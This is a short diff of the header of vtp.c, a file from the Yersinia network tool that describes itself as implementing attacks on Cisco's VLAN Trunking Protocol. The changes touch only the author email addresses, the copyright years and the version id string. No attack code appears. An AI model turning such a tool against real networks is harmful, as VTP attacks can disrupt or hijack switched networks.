@@ -2,8 +2,8 @@
  * Implementation and attacks for Cisco's VLAN Trunking Protocol
  *
  * Yersinia
- * By David Barroso <tomac@wasahero.org> and Alfredo Andres <slay@wasahero.org>
- * Copyright 2005 Alfredo Andres and David Barroso
+ * By David Barroso <tomac@yersinia.net> and Alfredo Andres <slay@yersinia.net>
+ * Copyright 2005, 2006, 2007 Alfredo Andres and David Barroso
  *
  * This program is free software; you can redistribute it and/or
  * modify it under the terms of the GNU General Public License
@@ -22,7 +22,7 @@
 
 #ifndef lint
 static const char rcsid[] = 
-       "$Id: vtp.c 22 2007-01-26 19:22:14Z tomac $";
+       "$Id: vtp.c 43 2007-04-27 11:07:17Z slay $";
 #endif
 
 #ifdef HAVE_CONFIG_H
